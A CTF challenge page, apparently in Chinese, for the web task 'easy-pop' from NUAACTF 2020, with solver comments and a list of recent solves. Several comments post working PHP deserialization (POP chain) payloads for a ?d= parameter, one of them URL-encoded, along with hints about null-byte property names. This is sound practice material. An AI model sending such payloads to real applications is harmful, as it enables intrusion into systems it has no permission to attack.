easy-popWEB 未解决

分数: 0 金币: 0
所属赛事: NUAACTF 2020
题目作者: 未知
一  血: Lxxx
一血奖励: 0金币
解  决: 344
提  示:
描  述:
nuaactf{}
评论
谢特恒123 17天前

类中不能直接赋值new evil要用到__construnct魔术方法来给ClassObj赋值为new evil

回复 0

网恋秀牛子被录屏导致自卑 5月前

$a=new lemon();就行

回复 0

solomom 7月前

?d=O:5:"lemon":1:{s:11:"%00*%00ClassObj";O:4:"evil":1:{s:10:"evildata";N;}}

回复 0

vincentshine 1年前

看了writeUP,不base64编码一下 真的会遗漏特殊字符,造成反序列化失败

回复 0

绝情且小帅 2年前

?d=O:5:"lemon":1:{s:11:"%00*%00ClassObj";O:4:"evil":1:{s:10:"%00evil%00data";N;}}

回复 0

vchopin 2年前

O%3A5%3A%22lemon%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3BN%3B%7D%7D

回复 0

chaoge 2年前

注意%00

回复 0

hopeinhand 2年前

简单的反序列化,重构 __constract()指向evil

回复 0

WriteUp

image
sean

1 金币

评分(1)

解题动态

hdcc1 攻破了该题 1天前
huozi 攻破了该题 3天前
mosi mita 攻破了该题 3天前
wjzkifaa 攻破了该题 16天前
谢特恒123 攻破了该题 17天前
Linsudo 攻破了该题 20天前
asdliuyan 攻破了该题 21天前
houst 攻破了该题 22天前
ppppppppppp 攻破了该题 22天前
houguan 攻破了该题 1月前
ysecer8 攻破了该题 1月前
13783690859 攻破了该题 1月前
HamiLemon 攻破了该题 1月前
hsk_zy 攻破了该题 1月前
yiluoqingqiu 攻破了该题 2月前
无敌小聪 攻破了该题 2月前
柯润 攻破了该题 2月前
lin123 攻破了该题 2月前
张伯伦 攻破了该题 2月前
鸟兽兽提交点堵flag来 攻破了该题 2月前
问题反馈